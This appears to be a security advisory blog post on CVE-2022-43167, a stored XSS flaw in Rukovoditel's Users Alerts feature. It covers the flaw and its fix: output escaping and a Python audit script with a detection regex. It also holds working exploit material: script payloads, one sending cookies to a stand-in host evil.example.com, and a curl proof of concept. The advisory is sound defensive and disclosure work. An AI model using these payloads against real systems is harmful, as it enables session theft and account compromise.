In October 2022, a critical stored cross-site scripting (XSS) vulnerability surfaced in Rukovoditel, a popular open source project management tool (official site). If you’re running version 3.2.1 or similar, your platform might be letting attackers plant malicious scripts, putting your users—and your data—at risk.
This post explains the vulnerability, how it could be abused, and how you can check if you’re exposed.
What Is CVE-2022-43167?
CVE-2022-43167 refers to a stored XSS flaw found in Rukovoditel’s Users Alerts feature. An authenticated attacker can inject malicious JavaScript by manipulating the “Title” parameter when they add a new alert.
When another user later views the alert, the attacker’s script runs in their browser—potentially stealing login tokens, redirecting them to fake pages, or executing other malicious actions.
Official Notice
- NVD Summary: CVE-2022-43167
- Exploit Database: EDB-ID: 51203
The vulnerability exists in this endpoint, which handles saving a new alert:
/index.php?module=users_alerts/users_alerts
Because the app doesn’t sanitize or encode the input, the payload gets stored in the database. Whenever a user or admin sees the alert, the browser processes the script.
The Exploit: Step-by-Step
Let’s see exactly how an attacker could exploit this bug.
1. Craft Your Payload
A classic XSS attack uses JavaScript to pop an alert, steal information, or perform harmful actions.
Example malicious Title:
<script>alert('XSS! Your session may be at risk.');</script>
To be stealthier, an attacker might use code that grabs the user’s cookie:
<script>fetch('https://evil.example.com/steal?c='+document.cookie)</script>
2. Send the Request
Send a POST request (or use the UI):
POST /index.php?module=users_alerts/users_alerts&action=create
POST data example:
title=<script>alert('XSS')</script>&description=anything
3. The Payload Gets Stored
Because the input isn’t sanitized or escaped, it goes directly into the database.
4. The Script Executes
Any user who views this alert triggers the malicious script.
Full PoC (Proof of Concept) Example
Here’s a curl command to automate the attack (you must replace COOKIE_VALUE with an actual login cookie):
curl -b "PHPSESSID=COOKIE_VALUE" \
-d "title=<script>alert('XSS')</script>&description=Test" \
-X POST "https://victim-site.com/index.php?module=users_alerts/users_alerts&action=create"
If you’re testing this (in a safe environment), you’ll see the JavaScript alert whenever you access the Users Alerts in the app UI.
Beyond session theft, the impact includes defacement: attackers could inject unsavory content, damaging trust.
Remember: The attacker needs to be authenticated, but Rukovoditel is often used as a team tool, so gaining some level of access is not always hard in open environments.
If you’re running Rukovoditel 3.2.1 (or any version not patched), you should:
1. Update: The easiest and safest fix is to upgrade to the latest secure version. Rukovoditel has downloads here.
2. Sanitize your input: If you need an emergency patch, make sure any user-supplied value is escaped before it is rendered, using PHP built-ins like htmlspecialchars().
Example before fix:
echo $alert['title'];
Example after fix:
echo htmlspecialchars($alert['title'], ENT_QUOTES, 'UTF-8');
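The following Python script is an added example, not code from this post or from the Rukovoditel project. It shows what the htmlspecialchars() fix above does to the stored payloads, and it audits a set of stored alert titles for markup that would execute if rendered unescaped, which is one way to check whether an existing installation already holds a planted payload. Python's html.escape(quote=True) is used as a stand-in for PHP's htmlspecialchars(..., ENT_QUOTES, 'UTF-8'); the row layout (id and title keys) and the sample rows are constructed for the example and are not Rukovoditel's schema or data.

```python
import html
import re

# Markup that a browser would act on if an alert title were echoed raw.
# Constructed for this example; extend the list for your own environment.
RISKY_MARKUP = re.compile(
    r"<\s*(script|iframe|img|svg|object|embed)\b"  # tags commonly used to run script
    r"|javascript\s*:"                             # javascript: URLs
    r"|\bon[a-z]+\s*=",                            # inline event handlers (onerror=, onload=, ...)
    re.IGNORECASE,
)


def escape_for_html(value: str) -> str:
    """Encode a stored value so it is shown as text rather than parsed as HTML.

    html.escape(quote=True) mirrors htmlspecialchars($v, ENT_QUOTES, 'UTF-8'):
    & < > " and ' all become entities, so a stored <script> tag is displayed, not run.
    (PHP emits &#039; for the single quote where Python emits &#x27;; browsers
    decode both identically.)
    """
    return html.escape(value, quote=True)


def is_risky_title(title: str) -> bool:
    """True if the title contains markup that would execute when rendered unescaped."""
    return RISKY_MARKUP.search(title) is not None


def audit_alert_titles(rows):
    """Return the ids of alert rows whose title carries risky markup.

    `rows` is any iterable of dicts with 'id' and 'title' keys, e.g. a
    'SELECT id, title FROM <alerts table>' export from the application database
    (table and column names are assumptions for this example).
    """
    return [row["id"] for row in rows if is_risky_title(row["title"])]


# Constructed sample rows standing in for a database export (not real data).
# Rows 2 and 4 carry the two payloads shown earlier in the post.
SAMPLE_ROWS = [
    {"id": 1, "title": "Server maintenance on Friday"},
    {"id": 2, "title": "<script>alert('XSS')</script>"},
    {"id": 3, "title": "Check <b>priority</b> tasks"},            # harmless formatting
    {"id": 4, "title": "<script>fetch('https://evil.example.com/steal?c='+document.cookie)</script>"},
    {"id": 5, "title": "Q: is 5 < 6? yes & see the FAQ"},        # angle bracket, not a tag
]

if __name__ == "__main__":
    for row in SAMPLE_ROWS:
        flag = "RISKY" if is_risky_title(row["title"]) else "ok   "
        print(f"{flag} id={row['id']} rendered-safe={escape_for_html(row['title'])}")
    print("flagged ids:", audit_alert_titles(SAMPLE_ROWS))
```

Run it as-is to see the two payload rows flagged and every title printed in its escaped form; to audit a real installation, replace SAMPLE_ROWS with rows read from your own database export. Escaping is the fix to keep: it makes the stored payload inert at render time regardless of how it got into the database. The audit only tells you whether something is already there, and it is pattern-based, so treat a clean result as a prompt to patch, not as proof of safety.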
Original Links and References
- CVE-2022-43167 — NVD Entry
- Exploit DB Proof of Concept
- Rukovoditel Project Homepage
- Github Advisory Database
Wrapping Up
CVE-2022-43167 is a simple, but dangerous, flaw in Rukovoditel 3.2.1’s Users Alerts. If you’re running this version, patch immediately or sanitize inputs using the guide above.
Stored XSS isn’t just a theoretical risk—it can lead to major incidents with a few lines of code. Always validate and escape user data, and stay on top of app updates.
*Found this useful? Protect your apps! For a hands-on test, consider using XSS scanners or working with security professionals.*
Timeline
Published on: 10/28/2022 17:15:00 UTC
Last modified on: 11/01/2022 17:33:00 UTC